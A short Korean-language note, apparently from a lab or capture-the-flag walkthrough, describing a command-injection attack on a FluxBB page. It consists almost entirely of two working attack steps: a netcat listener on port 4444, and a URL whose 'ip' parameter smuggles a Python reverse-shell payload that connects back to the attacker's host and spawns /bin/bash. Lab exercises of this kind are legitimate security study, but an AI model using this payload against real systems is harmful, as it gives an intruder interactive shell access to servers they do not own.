커맨드 인젝션 이용
포트열고 대기 (공격자)
nc -lvnp 4444
Bash
복사
브라우저에서 아래 주소로 요청
http://192.168.10.133/fluxbb/index.php?ip=8.8.8.8;python3 -c 'import%20socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.130",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
Plain Text
복사
